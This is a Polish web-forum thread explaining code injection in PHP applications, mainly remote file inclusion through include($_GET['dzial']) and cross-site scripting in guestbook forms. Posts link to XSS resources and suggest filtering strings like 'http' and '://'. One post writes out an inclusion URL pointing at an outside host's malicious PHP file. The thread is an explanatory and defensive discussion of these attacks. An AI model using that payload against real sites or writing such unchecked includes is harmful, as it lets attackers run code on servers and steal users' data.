![]() |
![]() |
![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 9 Pomógł: 0 Dołączył: 7.02.2003 Ostrzeżenie: (0%) ![]() ![]() |
Wlasnie na czym to polega? Gdzie znajde o tym wiecej informacji. Goggle i manual nic mi nie powiedzialy. Jakies odnosniki, najlepiej z przykladami.
|
|
|
![]() |
![]()
Post
#2
|
|
Grupa: Zarejestrowani Postów: 33 Pomógł: 0 Dołączył: 19.03.2002 Skąd: Gliwice Ostrzeżenie: (0%) ![]() ![]() |
masz na myśli ataki na aplikacje? jeżeli tak to tam znajdziesz coś na temat:
http://www.computerworld.pl/artykuly/31505.html |
|
|
![]()
Post
#3
|
|
![]() Grupa: Zarejestrowani Postów: 207 Pomógł: 0 Dołączył: 7.03.2002 Skąd: Warszawa Ostrzeżenie: (0%) ![]() ![]() |
Sprawa wydaję się prosta:
Istnieje sobie adres http://qwe.pl/i.php?dzial=jakis albo jeszcze lepiej http://qwe.pl/i.php?dzial=jakis.php Jak można się domyślać, ktoś bardzo mądrze napisał kod takiego skryptu i bezpośrednio używa funkcji include($_GET['dzial']). W ten sposób możesz wywołać adres: http://qwe.pl/i.php?dzial=http://123.234.1...okrutny_kod.php Teraz możesz zmieniać sobie zawartość pliku okrutny_kod.php i wykonujesz własny kod na prawach serwera www. -------------------- Tomasz Wasiluk
Polcode >> Szukamy programistów z pasją |
|
|
![]()
Post
#4
|
|
![]() Grupa: Zarejestrowani Postów: 83 Pomógł: 0 Dołączył: 31.03.2002 Skąd: Toruń Ostrzeżenie: (0%) ![]() ![]() |
Innym przykładem jest wstawianie kodu html do formularzy. Widziałem wiele takich kwiatków w księgach gości - można było na przykład wstawić ciąg <!--, który zasłaniał wszystko, co występuje poniżej, nie mówiąc już o wstawianiu przez kogoś bardziej złośliwego skryptów JavaScript wywalających przeglądarkę, kradnących dane z formularza lub z cookie czy robiących inne cuda :)
Moim zdaniem, skrajnym idiotyzmem jest np. wpuszczanie do zapytania do bazy czystego tekstu przekazanego prosto z formularza czy przekazywanie przez GET lub POST nazw tabel i ich pól oraz parametrów zapytań, co świetnie zostało opisane w artykule zlinkowanym przez domm'a :) W goglu można znaleźć wiele ciekawych rzeczy na ten temat, pod hasłem "Cross-Site Scripting" (XSS): The Cross Site Scripting FAQ: http://www.cgisecurity.com/articles/xss-faq.shtml Malicious HTML Tags Embedded in Client Web Requests: http://www.cert.org/advisories/CA-2000-02.html nawet po polsku coś: Problemy bezpieczeństwa ośrodków webowych: http://www.networld.pl/artykuly/21050_2.html Bezpieczeństwo stron www: http://www.hacking.pl/articles.php?id=33 no i sam google, który jest pełen przydatnych informacji na ten temat :) -------------------- misiu | chór
"Zdeterminowany programista potrafi stworzyć fatalny kod w każdym języku" Allen Holub |
|
|
![]()
Post
#5
|
|
![]() Grupa: Zarejestrowani Postów: 207 Pomógł: 0 Dołączył: 7.03.2002 Skąd: Warszawa Ostrzeżenie: (0%) ![]() ![]() |
Tak, cross-site scripting to całkiem poważny problem i naprawdę ciężko
go uniknąć, czego przykładem był (pewnie jest) swojego czasu Hotmail. Nawet nasze Allegro.pl miało (ma) ten błąd. Z moją pomocą zmniejszyli możliwości jego wykorzystania ![]() -------------------- Tomasz Wasiluk
Polcode >> Szukamy programistów z pasją |
|
|
![]()
Post
#6
|
|
Grupa: Zarejestrowani Postów: 29 Pomógł: 0 Dołączył: 2.03.2003 Skąd: Tarnów Ostrzeżenie: (0%) ![]() ![]() |
Czy istnieje jakis skrypt co by wylapywal bledne zapytania ? Jezeli nie to jakie sekwencje nalezalo by wylapac ? Chcialbym sobie do aplikacji zrobic funkcje ktora najpierw bedzie grepowala dane pod wzgledem poprawnosci i dopiero pozniej pozwalala na zapis danych do bazy
-------------------- Pozdrawiam
Piotr P. 'g0blin' |
|
|
![]()
Post
#7
|
|
Grupa: Zarejestrowani Postów: 33 Pomógł: 0 Dołączył: 19.03.2002 Skąd: Gliwice Ostrzeżenie: (0%) ![]() ![]() |
Tak na marginesie, nawiązując do przykładu podanego przez Hypera trzeba dodać iż php pod windowsem dość przypadkowo jest "samo w sobie" odporne na ataki z podstawieniem URL-a zamiast własnego, lokalnego kodu:
Manual mówi: Cytat Wersja php pracująca pod systemami Windows nie obsługuje dostępu do zdalnych plików w tej funkcji, nawet jeśli opcja allow_url_fopen jest włączona.
Niemniej jednak stosując takie rozwiązanie podania pliku do "includowania" bądź "reqirowania" zawsze można uznać iż skrypt będzie kiedyś pracował pod innym systemem lub kolejna, nowsza wersja php będzie obsługiwać allow_url_fopen i z góry wypada się zabezpieczyć żeby nie pochodził on z innego źródła niż ma pochodzić (np. sprawdzić podejrzane ciągi znaków w zmiennej, takie jak np. "http", "://" itp). Można oczywiście wyłączyć allow_url_fopen, ale chyba nie o to chodzi. Jednocześnie trzeba przyznać iż ataki typu "code injection" to ciekawy temat; można mieć najlepszy na świecie firewall, dmuchać i chuchać na wszystko a tu mała luka w kodzie i FRUUUUU :wink: |
|
|
![]() ![]() |
![]() |
Aktualny czas: 22.08.2025 - 11:30 |